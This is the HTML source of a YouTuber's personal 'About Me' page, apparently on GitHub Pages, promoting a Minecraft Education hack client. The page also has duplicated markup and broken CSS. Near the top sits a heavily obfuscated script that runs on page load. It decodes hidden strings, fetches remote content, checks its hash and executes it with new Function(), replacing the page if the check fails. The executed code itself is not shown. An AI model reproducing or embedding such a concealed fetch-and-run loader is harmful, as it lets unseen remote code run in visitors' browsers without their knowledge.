

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <link rel="icon" type="image/png" href="/assets/cqmbo__32x32.png">
  <style>
    body {
      background: linear-gradient(to bottom, #add8e6, #ffffff);
      font-family: Arial, sans-serif;
      text-align: center;
      padding-top: 50px;
      margin: 0;
      color: #333;
    }
    a {
      color: #0DC6D0;
      text-decoration: none;
    }
  </style>
</head>
<body>
  <hr>
<h2>layout: default
title: About Me
permalink: /about/</h2>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <link rel="icon" type="image/png" href="/assets/cqmbo__32x32.png">
  <style>
    body {
      background: linear-gradient(to bottom, #add8e6, #ffffff);
      font-family: Arial, sans-serif;
      text-align: center;
      padding-top: 50px;
      margin: 0;
      color: #333;
    }
    a {
      color: #0DC6D0;
      text-decoration: none;
    }
  </style>
</head>
<body>
  {% raw %}
<script>
Function("_65Ic2","const JceBIKM=[0,null,32,2,1,256,6,3,8,16,4,\"undefined\",\"LZString\",15];var xu2iAf=function(){var XHqdPP=String.fromCharCode,iAhe798=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",WZkHqm=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$\",kOGAX5_={};function gHFbhUn(gHFbhUn,b3ccF_){if(!kOGAX5_[gHFbhUn]){kOGAX5_[gHFbhUn]={};for(var mXdJ093=JceBIKM[0];mXdJ093<gHFbhUn.length;mXdJ093++)kOGAX5_[gHFbhUn][gHFbhUn.charAt(mXdJ093)]=mXdJ093}return kOGAX5_[gHFbhUn][b3ccF_]}var b3ccF_={compressToBase64:function(kOGAX5_){if(JceBIKM[1]==kOGAX5_)return\"\";var gHFbhUn=b3ccF_._compress(kOGAX5_,JceBIKM[6],function(gHFbhUn){return iAhe798.charAt(gHFbhUn)});switch(gHFbhUn.length%JceBIKM[10]){default:case JceBIKM[0]:return gHFbhUn;case JceBIKM[4]:return gHFbhUn+\"===\";case JceBIKM[3]:return gHFbhUn+\"==\";case JceBIKM[7]:return gHFbhUn+\"=\"}},decompressFromBase64:function(kOGAX5_){return JceBIKM[1]==kOGAX5_?\"\":\"\"==kOGAX5_?JceBIKM[1]:b3ccF_._decompress(kOGAX5_.length,JceBIKM[2],function(b3ccF_){return gHFbhUn(iAhe798,kOGAX5_.charAt(b3ccF_))})},compressToUTF16:function(WZkHqm){return JceBIKM[1]==WZkHqm?\"\":b3ccF_._compress(WZkHqm,JceBIKM[13],function(kOGAX5_){return XHqdPP(kOGAX5_+JceBIKM[2])})+\" \"},decompressFromUTF16:function(WZkHqm){return JceBIKM[1]==WZkHqm?\"\":\"\"==WZkHqm?JceBIKM[1]:b3ccF_._decompress(WZkHqm.length,16384,function(kOGAX5_){return WZkHqm.charCodeAt(kOGAX5_)-JceBIKM[2]})},compressToUint8Array:function(_G5scRQ){for(var B9byFu=b3ccF_.compress(_G5scRQ),dqnHrgp=new Uint8Array(JceBIKM[3]*B9byFu.length),kyxKLte=JceBIKM[0],I6851p=B9byFu.length;kyxKLte<I6851p;kyxKLte++){var L6SyqJ3=B9byFu.charCodeAt(kyxKLte);dqnHrgp[JceBIKM[3]*kyxKLte]=L6SyqJ3>>>JceBIKM[8],dqnHrgp[JceBIKM[3]*kyxKLte+JceBIKM[4]]=L6SyqJ3%JceBIKM[5]}return dqnHrgp},decompressFromUint8Array:function(GmRHUkX){if(JceBIKM[1]==GmRHUkX)return b3ccF_.decompress(GmRHUkX);for(var B_BVBZ=new Array(GmRHUkX.length/JceBIKM[3]),F8ljVnB=JceBIKM[0],si1DKCg=B_BVBZ.length;F8ljVnB<si1DKCg;F8ljVnB++)B_BVBZ[F8ljVnB]=JceBIKM[5]*GmRHUkX[JceBIKM[3]*F8ljVnB]+GmRHUkX[JceBIKM[3]*F8ljVnB+JceBIKM[4]];var l1BkYh=[];return B_BVBZ.forEach(function(B_BVBZ){l1BkYh.push(XHqdPP(B_BVBZ))}),b3ccF_.decompress(l1BkYh.join(\"\"))},compressToEncodedURIComponent:function(iAhe798){return JceBIKM[1]==iAhe798?\"\":b3ccF_._compress(iAhe798,JceBIKM[6],function(kOGAX5_){return WZkHqm.charAt(kOGAX5_)})},decompressFromEncodedURIComponent:function(kOGAX5_){return JceBIKM[1]==kOGAX5_?\"\":\"\"==kOGAX5_?JceBIKM[1]:(kOGAX5_=kOGAX5_.replace(/ /g,\"+\"),b3ccF_._decompress(kOGAX5_.length,JceBIKM[2],function(b3ccF_){return gHFbhUn(WZkHqm,kOGAX5_.charAt(b3ccF_))}))},compress:function(WZkHqm){return b3ccF_._compress(WZkHqm,JceBIKM[9],function(kOGAX5_){return XHqdPP(kOGAX5_)})},_compress:function(gqn3JfJ,ksuX_a,IPe8zQB){if(JceBIKM[1]==gqn3JfJ)return\"\";var aXv1xKq,usa1yE,Mlle_lU,hXKu3S={},h_U6AU={},f97GXyq=\"\",b1NRO4p=\"\",e_OxSY=\"\",z3K06_=JceBIKM[3],D4_eX4F=JceBIKM[7],ClmgNK=JceBIKM[3],BODE8t=[],x79GbH=JceBIKM[0],tvdpf4=JceBIKM[0];for(Mlle_lU=JceBIKM[0];Mlle_lU<gqn3JfJ.length;Mlle_lU+=JceBIKM[4])if(f97GXyq=gqn3JfJ.charAt(Mlle_lU),Object.prototype.hasOwnProperty.call(hXKu3S,f97GXyq)||(hXKu3S[f97GXyq]=D4_eX4F++,h_U6AU[f97GXyq]=!JceBIKM[0]),b1NRO4p=e_OxSY+f97GXyq,Object.prototype.hasOwnProperty.call(hXKu3S,b1NRO4p))e_OxSY=b1NRO4p;else{if(Object.prototype.hasOwnProperty.call(h_U6AU,e_OxSY)){if(e_OxSY.charCodeAt(JceBIKM[0])<JceBIKM[5]){for(aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH<<=JceBIKM[4],tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++;for(usa1yE=e_OxSY.charCodeAt(JceBIKM[0]),aXv1xKq=JceBIKM[0];aXv1xKq<JceBIKM[8];aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4]}else{for(usa1yE=JceBIKM[4],aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE=JceBIKM[0];for(usa1yE=e_OxSY.charCodeAt(JceBIKM[0]),aXv1xKq=JceBIKM[0];aXv1xKq<JceBIKM[9];aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4]}JceBIKM[0]==--z3K06_&&(z3K06_=Math.pow(JceBIKM[3],ClmgNK),ClmgNK++),delete h_U6AU[e_OxSY]}else for(usa1yE=hXKu3S[e_OxSY],aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4];JceBIKM[0]==--z3K06_&&(z3K06_=Math.pow(JceBIKM[3],ClmgNK),ClmgNK++),hXKu3S[b1NRO4p]=D4_eX4F++,e_OxSY=String(f97GXyq)}if(\"\"!==e_OxSY){if(Object.prototype.hasOwnProperty.call(h_U6AU,e_OxSY)){if(e_OxSY.charCodeAt(JceBIKM[0])<JceBIKM[5]){for(aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH<<=JceBIKM[4],tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++;for(usa1yE=e_OxSY.charCodeAt(JceBIKM[0]),aXv1xKq=JceBIKM[0];aXv1xKq<JceBIKM[8];aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4]}else{for(usa1yE=JceBIKM[4],aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE=JceBIKM[0];for(usa1yE=e_OxSY.charCodeAt(JceBIKM[0]),aXv1xKq=JceBIKM[0];aXv1xKq<JceBIKM[9];aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4]}JceBIKM[0]==--z3K06_&&(z3K06_=Math.pow(JceBIKM[3],ClmgNK),ClmgNK++),delete h_U6AU[e_OxSY]}else for(usa1yE=hXKu3S[e_OxSY],aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4];JceBIKM[0]==--z3K06_&&(z3K06_=Math.pow(JceBIKM[3],ClmgNK),ClmgNK++)}for(usa1yE=JceBIKM[3],aXv1xKq=JceBIKM[0];aXv1xKq<ClmgNK;aXv1xKq++)x79GbH=x79GbH<<JceBIKM[4]|JceBIKM[4]&usa1yE,tvdpf4==ksuX_a-JceBIKM[4]?(tvdpf4=JceBIKM[0],BODE8t.push(IPe8zQB(x79GbH)),x79GbH=JceBIKM[0]):tvdpf4++,usa1yE>>=JceBIKM[4];for(;;){if(x79GbH<<=JceBIKM[4],tvdpf4==ksuX_a-JceBIKM[4]){BODE8t.push(IPe8zQB(x79GbH));break}tvdpf4++}return BODE8t.join(\"\")},decompress:function(WZkHqm){return JceBIKM[1]==WZkHqm?\"\":\"\"==WZkHqm?JceBIKM[1]:b3ccF_._decompress(WZkHqm.length,32768,function(kOGAX5_){return WZkHqm.charCodeAt(kOGAX5_)})},_decompress:function(CLj6sGc,sZw78hG,ysiqkMh){var Gp3_6P,N3CIEH2,jqKFiQ,SWZ2FG,kfBTU03,SnZPd6,_CnIka,IelAPkw=[],qkmKlo5=JceBIKM[10],BvOKgyK=JceBIKM[10],I5ebw_=JceBIKM[7],LcI8RhE=\"\",gIE82pr=[],N23o_Qe={val:ysiqkMh(JceBIKM[0]),position:sZw78hG,index:JceBIKM[4]};for(Gp3_6P=JceBIKM[0];Gp3_6P<JceBIKM[7];Gp3_6P+=JceBIKM[4])IelAPkw[Gp3_6P]=Gp3_6P;for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],JceBIKM[3]),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];switch(jqKFiQ){case JceBIKM[0]:for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],JceBIKM[8]),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];_CnIka=XHqdPP(jqKFiQ);break;case JceBIKM[4]:for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],JceBIKM[9]),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];_CnIka=XHqdPP(jqKFiQ);break;case JceBIKM[3]:return\"\"}for(IelAPkw[JceBIKM[7]]=_CnIka,N3CIEH2=_CnIka,gIE82pr.push(_CnIka);;){if(N23o_Qe.index>CLj6sGc)return\"\";for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],I5ebw_),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];switch(_CnIka=jqKFiQ){case JceBIKM[0]:for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],JceBIKM[8]),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];IelAPkw[BvOKgyK++]=XHqdPP(jqKFiQ),_CnIka=BvOKgyK-JceBIKM[4],qkmKlo5--;break;case JceBIKM[4]:for(jqKFiQ=JceBIKM[0],kfBTU03=Math.pow(JceBIKM[3],JceBIKM[9]),SnZPd6=JceBIKM[4];SnZPd6!=kfBTU03;)SWZ2FG=N23o_Qe.val&N23o_Qe.position,N23o_Qe.position>>=JceBIKM[4],JceBIKM[0]==N23o_Qe.position&&(N23o_Qe.position=sZw78hG,N23o_Qe.val=ysiqkMh(N23o_Qe.index++)),jqKFiQ|=(SWZ2FG>JceBIKM[0]?JceBIKM[4]:JceBIKM[0])*SnZPd6,SnZPd6<<=JceBIKM[4];IelAPkw[BvOKgyK++]=XHqdPP(jqKFiQ),_CnIka=BvOKgyK-JceBIKM[4],qkmKlo5--;break;case JceBIKM[3]:return gIE82pr.join(\"\")}if(JceBIKM[0]==qkmKlo5&&(qkmKlo5=Math.pow(JceBIKM[3],I5ebw_),I5ebw_++),IelAPkw[_CnIka])LcI8RhE=IelAPkw[_CnIka];else{if(_CnIka!==BvOKgyK)return JceBIKM[1];LcI8RhE=N3CIEH2+N3CIEH2.charAt(JceBIKM[0])}gIE82pr.push(LcI8RhE),IelAPkw[BvOKgyK++]=N3CIEH2+LcI8RhE.charAt(JceBIKM[0]),N3CIEH2=LcI8RhE,JceBIKM[0]==--qkmKlo5&&(qkmKlo5=Math.pow(JceBIKM[3],I5ebw_),I5ebw_++)}}};return b3ccF_}();\"function\"==_65Ic2[\"EdlXzG_\"]&&_65Ic2[\"bBq8C5\"].amd?_65Ic2[\"bBq8C5\"](function(){return xu2iAf}):JceBIKM[11]!=_65Ic2[\"xQFoMf5\"]&&JceBIKM[1]!=_65Ic2[\"WoMDgAd\"]?_65Ic2[\"WoMDgAd\"].exports=xu2iAf:JceBIKM[11]!=_65Ic2[\"lJAKXC\"]&&JceBIKM[1]!=_65Ic2[\"GtaTZj\"]&&_65Ic2[\"GtaTZj\"].module(JceBIKM[12],[]).factory(JceBIKM[12],function(){return xu2iAf});var XHqdPP;(function(){var JceBIKM=\"\\u19E2\\u5C31\\u407C\\u0380\\u5321\\u7824\\u606B\\u01EC\\u3624\\u7052\\u4032\\u0228\\u05C0\\u04E0\\u15A0\\u1B3C\\u1823\\u582C\\u303E\\u60DC\\xEC\\u0159\\u6836\\u675B\\u012CY\\u60A7\\u25A2\\u05B2\\u1534\\u38DD\\u5C33\\u0791\\u34E0\\u0587\\u264E%\\u4224\\u2F80|\\u0114\\u5D5C\\u6221\\u6888\\u025B\\u59A3\\u5250\\u0F07\\u22E0\\u1AE6\\u05D0\\u11E6\\x8E\\u3855\\u5C8A\\u57E2\\u53C0\\u20E3\\u5BE3\\u5839\\u7114\\u67580\\u4A2E\\u4368\\u70601\\u6D32\\u4CFC\\u2478\\u0220\\u4620\\u0209\\u4141\\u5023\\u1831\\u05FC\\u3032\\u112D\\u08B0\\u54E0\\u0100\\u0253\\u6B8A,n\\u1B6D\\u0C39\\u502E\\u678D\\u3440\\u5A88\\u3428\\u66C6\\u3378\\u0630\\u5F74\\u6321\\u50B3\\u3BDAL\\u323A\\u0F9D\\u35CC\\u4F70\\u47C9\\u42D5\\u07A6\\u7020\\u3194\\u667C\\u0EB7\\u4D67\\u06D5\\u0863\\u6020\\u3CCA\\u7AA0\\u1F40\\xCC\\u482F\\u041C\\u2581\\u118F\\u097E\\u2A9F\\u0431\\u1180\\u4074\\u227A\\u671A\\u5494\\u0830\\u0DEA\\u6E4C\\u153B\\u42A2\\u7E81\\u11B1\\u1020\\u1580\\u6E50\\u0324\\u25B0\\u6039\\u2B24\\u25D8\\u2A20\\u0A08\\u49A1\\u3198\\u49E2\\u71FD\\u3A67\\u4A09\\u72E5\\u58C0  \",Wn1TV7=xu2iAf.decompressFromUTF16(JceBIKM),bHl9TR3=Wn1TV7.split(\"|\");XHqdPP=function(JceBIKM){return bHl9TR3[JceBIKM]}})();return async function(){async function gZNn7Ol(gZNn7Ol){const QloPsUt=await _65Ic2[\"PFeJFeT\"][XHqdPP(JceBIKM[0])][XHqdPP(JceBIKM[4])](XHqdPP(JceBIKM[3]),new TextEncoder()[XHqdPP(JceBIKM[7])](gZNn7Ol));return Array[XHqdPP(JceBIKM[10])](new Uint8Array(QloPsUt))[XHqdPP(5)](gZNn7Ol=>{return gZNn7Ol[XHqdPP(JceBIKM[6])](JceBIKM[9])[XHqdPP(7)](JceBIKM[3],\"0\")})[XHqdPP(JceBIKM[8])](\"\")}try{const QloPsUt=await _65Ic2[\"bw4h_r\"](XHqdPP(9),{[XHqdPP(10)]:XHqdPP(11),[XHqdPP(12)]:XHqdPP(13)});if(!QloPsUt.ok){throw new Error(XHqdPP(14))}const NTLng3=await QloPsUt[XHqdPP(JceBIKM[13])](),SUTdKk=await gZNn7Ol(NTLng3),OAo1XA=XHqdPP(JceBIKM[9]);if(SUTdKk!==OAo1XA){throw new Error(XHqdPP(17))}new Function(NTLng3)()}catch(M7gmANZ){document[XHqdPP(18)]();document[XHqdPP(19)](XHqdPP(20));document[XHqdPP(21)]()}}();")({get"bBq8C5"(){return define},get"WoMDgAd"(){return module},set"WoMDgAd"(_65Ic2){return module=_65Ic2},get"GtaTZj"(){return angular},get"PFeJFeT"(){return crypto},get"bw4h_r"(){return fetch},get"EdlXzG_"(){return typeof define},get"xQFoMf5"(){return typeof module},get"lJAKXC"(){return typeof angular}});
</script>
{% endraw %}





<style>
  /* Gradient background for the page */
  body {
    background: linear-gradient(to bottom, #add8e6, #ffffff); /* Light blue to white gradient */
    color: #333; /* Text color for readability */
    font-family: Arial, sans-serif;
    text-align: center;
    padding-top: 50px;
    margin: 0;
  }

  /* Button styling */
  .hbutton {
    background-color: #8ED6F0; /* Brighter button color */
    border: none;
    color: white;
    padding: 10px; /* Reduced padding */
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 18px; /* Increased font size */
    margin: 10px 5px;
    cursor: pointer;
    border-radius: 5px;
    position: relative; /* For shine effect */
    overflow: hidden; /* To contain shine effect */
    transition: background-color 0.3s, width 0.3s;
    min-width: 15%;
  } min-width: 15%;
  }

  .hbutton:hover {
    background-color: #0DC6D0;
  }

  .hbutton::after {
    content: '';
    position: absolute;
    top: -50%;
    left: -50%;
    width: 200%;
    height: 200%;
    background: rgba(255, 255, 255, 0.5);
    transform: rotate(50deg);
    transition: all 0.5s ease;
    opacity: 0.5; /* Static shine effect */
  }
  
  .hbutton:hover::after {
    opacity: 1;
    animation: shine 1s infinite;
  }

  /* Button styling */
  .button {
    background-color: #8ED6F0; /* Brighter button color */
    border: none;
    color: white;
    padding: 6px; /* Reduced padding */
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 15px; /* Increased font size */
    cursor: pointer;
    border-radius: 5px;
    transition: background-color 0.3s, width 0.3s;
    overflow: hidden;
    white-space: nowrap;
    position: absolute; /* Absolute positioning for button placement */
  }

  .button:hover {
    background-color: #0DC6D0;
  }
  
   .button::after {
    content: '';
    position: absolute;
    top: -50%;
    left: -50%;
    width: 200%;
    height: 200%;
    background: rgba(255, 255, 255, 0.5);
    transform: rotate(45deg);
    transition: all 0.5s ease;
    opacity: 0.5; /* Static shine effect */
  }
  
    @keyframes shine {
    0% {
      left: -200%;
      top: 0;
    }
    100% {
      left: 200%;
      top: 0;
    }
  }
  
  .button:hover::after {
    opacity: 1;
    animation: shine 1.25s infinite;
  }

  /* Responsive width based on size classes */
  .large {
    
    width: 38%; /* Expand within its container */
    max-width: 38%; /* Limit to large size */
    font-size: 14px;
    min-width: 38%;
  }

  .medium {
    
    width: 20%; /* Expand within its container */
    max-width: 20%; /* Limit to medium size */
    font-size: 14px;
    min-width: 20%;
  }

  .small {
    
    width: 16%; /* Expand within its container */
    max-width: 16%; /* Limit to small size */
    min-width: 16%;
  }

  /* Container to hold buttons and define their relative positions */
  .video-buttons-container {
    position: relative;
    height: 500px; /* Adjust as necessary */
    width: 100%;
    max-width: 100%;
    margin: 0 auto; /* Center container */
  }
</style>

<p><a href="https://cqmbo1.github.io/" class="hbutton">Welcome</a>
<a href="https://cqmbo1.github.io/about" class="hbutton">About Me</a>
<a href="https://cqmbo1.github.io/v" class="hbutton">Videos</a>
<a href="https://cqmbo1.github.io/educlient" class="hbutton">Edu Client</a>
<a href="https://cqmbo1.github.io/code" class="hbutton">SCRIPTS</a>
<a href="https://cqmbo1.github.io/tools" class="hbutton">Tools</a></p>
<div id="main-text" style ="z-index: 10000">

<p><strong>About Me: Cqmbo__</strong></p>
<h3>
I'm a youtuber, I make minecraft and .io vids. I make a Minecraft Education Hack Client called "EDU Client".
</h3>

<p>
Subscribe to me & if you have any questions, comment on any of my videos.
<br>
<a href="https://www.youtube.com/channel/UCpumE9BB8uejsbQIk_VXtgQ"> https://www.youtube.com/channel/UCpumE9BB8uejsbQIk_VXtgQ</a>
</p>
</div>


<script>
  // Create a link element
  var favicon = document.createElement('link');
  favicon.rel = 'icon';                // Set rel attribute for favicon
  favicon.type = 'image/png';           // Set type attribute
  favicon.href = '/assets/cqmbo__32x32.png'; // Set the URL for the favicon

  // Append the link element to the head
  document.head.appendChild(favicon);
</script>
</body>
</html>
      
</body>
</html>
      